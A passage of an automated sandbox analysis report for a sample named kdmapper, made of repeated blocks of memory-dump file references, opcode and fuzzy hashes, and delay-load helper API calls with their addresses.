                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                                              • Opcode ID: 0c1de9503e8cf192498b5c460ec7786f4bfd813188516e9b822b4ab19d9b8622
                                                                                                                                                                                                              • Instruction ID: df9207e707744cb2d4945276d7ba8dcab0e3afbd530d3630ea26def6398965f2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0c1de9503e8cf192498b5c460ec7786f4bfd813188516e9b822b4ab19d9b8622
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97B012D1A992047D310861182C03D3B030CC0C1F20331E12EF515D0591E8804C400471
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DFE51F
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                                              • Opcode ID: 7e704f01d6c09944fc64c49c8e1ad60e536386db7909e632b72ca71969174674
                                                                                                                                                                                                              • Instruction ID: e77677969b1fec4c203848c667badf6f06ed80ac6072703ff65a2bcb2db9994b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e704f01d6c09944fc64c49c8e1ad60e536386db7909e632b72ca71969174674
                                                                                                                                                                                                              • Instruction Fuzzy Hash: ECB012D1A992447C320861182D03C3B070CC0C1F20331E12EF615D0591E8804C410471
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DFE1E3
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                                              • Opcode ID: 2a29507cf884df64e16842f2b85dac85d87b462f96962e84dc223a1944cbb330
                                                                                                                                                                                                              • Instruction ID: 4a38024f01207f17b39d77bb437e8f4d4388a56331cd6a37e7ef6492e20341e7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2a29507cf884df64e16842f2b85dac85d87b462f96962e84dc223a1944cbb330
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A7A001E66A934ABC312866526D06C7B431EC4C5BA1332D92EFA57D44A1A890A88518B1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DFE1E3
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                                              • Opcode ID: 0c74cbe517146ce8d925e6766d3591dc21e5ee0c21abc546b76de7933c6051d2
                                                                                                                                                                                                              • Instruction ID: 4a38024f01207f17b39d77bb437e8f4d4388a56331cd6a37e7ef6492e20341e7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0c74cbe517146ce8d925e6766d3591dc21e5ee0c21abc546b76de7933c6051d2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A7A001E66A934ABC312866526D06C7B431EC4C5BA1332D92EFA57D44A1A890A88518B1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DFE1E3
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                                              • Opcode ID: ade52adaa51fc0edd1578b1db0afa0f512f87877e7c08040804065f972ec7171
                                                                                                                                                                                                              • Instruction ID: 4a38024f01207f17b39d77bb437e8f4d4388a56331cd6a37e7ef6492e20341e7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ade52adaa51fc0edd1578b1db0afa0f512f87877e7c08040804065f972ec7171
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A7A001E66A934ABC312866526D06C7B431EC4C5BA1332D92EFA57D44A1A890A88518B1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DFE1E3
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                                              • Opcode ID: edc78e7d06eda22c77d751f26657d01a37e8ad31359916660be755a24b0e76da
                                                                                                                                                                                                              • Instruction ID: 4a38024f01207f17b39d77bb437e8f4d4388a56331cd6a37e7ef6492e20341e7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: edc78e7d06eda22c77d751f26657d01a37e8ad31359916660be755a24b0e76da
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A7A001E66A934ABC312866526D06C7B431EC4C5BA1332D92EFA57D44A1A890A88518B1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DFE1E3
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                                              • Opcode ID: fd71818b15760dad5001723d5022928f741f34b37f28259d4bc710da236e3ccf
                                                                                                                                                                                                              • Instruction ID: 4a38024f01207f17b39d77bb437e8f4d4388a56331cd6a37e7ef6492e20341e7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fd71818b15760dad5001723d5022928f741f34b37f28259d4bc710da236e3ccf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A7A001E66A934ABC312866526D06C7B431EC4C5BA1332D92EFA57D44A1A890A88518B1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DFE1E3
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                                              • Opcode ID: d2f7f9f4f93e7e9438021a41310172ff6b5a671d8b40f66e4ca4a0388e5a3a39
                                                                                                                                                                                                              • Instruction ID: 4a38024f01207f17b39d77bb437e8f4d4388a56331cd6a37e7ef6492e20341e7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d2f7f9f4f93e7e9438021a41310172ff6b5a671d8b40f66e4ca4a0388e5a3a39
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A7A001E66A934ABC312866526D06C7B431EC4C5BA1332D92EFA57D44A1A890A88518B1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DFE1E3
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                                              • Opcode ID: cb8014c9e5de0e62511160be1f32208cbcaedba29c32292019bc1622df25d438
                                                                                                                                                                                                              • Instruction ID: 4a38024f01207f17b39d77bb437e8f4d4388a56331cd6a37e7ef6492e20341e7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb8014c9e5de0e62511160be1f32208cbcaedba29c32292019bc1622df25d438
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A7A001E66A934ABC312866526D06C7B431EC4C5BA1332D92EFA57D44A1A890A88518B1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DFE1E3
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                                              • Opcode ID: ff9b29caba0f65c56e2ac2736e0e2c8045dfae1dc500b000aab4e4dc174ff628
                                                                                                                                                                                                              • Instruction ID: 4a38024f01207f17b39d77bb437e8f4d4388a56331cd6a37e7ef6492e20341e7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ff9b29caba0f65c56e2ac2736e0e2c8045dfae1dc500b000aab4e4dc174ff628
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A7A001E66A934ABC312866526D06C7B431EC4C5BA1332D92EFA57D44A1A890A88518B1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DFE1E3
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                                              • Opcode ID: 2d094930994d229b0132ef7e3ba3a95f281314208807cd872ada17b7ebea6ab2
                                                                                                                                                                                                              • Instruction ID: 4a38024f01207f17b39d77bb437e8f4d4388a56331cd6a37e7ef6492e20341e7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2d094930994d229b0132ef7e3ba3a95f281314208807cd872ada17b7ebea6ab2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A7A001E66A934ABC312866526D06C7B431EC4C5BA1332D92EFA57D44A1A890A88518B1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DFE1E3
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                                              • Opcode ID: cc5e58359dcfe7b0ff648b52d0e7d7b837b295c32aef1b3fcbf1b90cbfe25671
                                                                                                                                                                                                              • Instruction ID: 4a38024f01207f17b39d77bb437e8f4d4388a56331cd6a37e7ef6492e20341e7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cc5e58359dcfe7b0ff648b52d0e7d7b837b295c32aef1b3fcbf1b90cbfe25671
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A7A001E66A934ABC312866526D06C7B431EC4C5BA1332D92EFA57D44A1A890A88518B1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DFE1E3
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                                              • Opcode ID: 4fb97a27d7cd858c77cefbbdf58a0c21bac0e86bb65d76ace14245fdec0c4a7d
                                                                                                                                                                                                              • Instruction ID: 4a38024f01207f17b39d77bb437e8f4d4388a56331cd6a37e7ef6492e20341e7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4fb97a27d7cd858c77cefbbdf58a0c21bac0e86bb65d76ace14245fdec0c4a7d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A7A001E66A934ABC312866526D06C7B431EC4C5BA1332D92EFA57D44A1A890A88518B1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DFE3FC
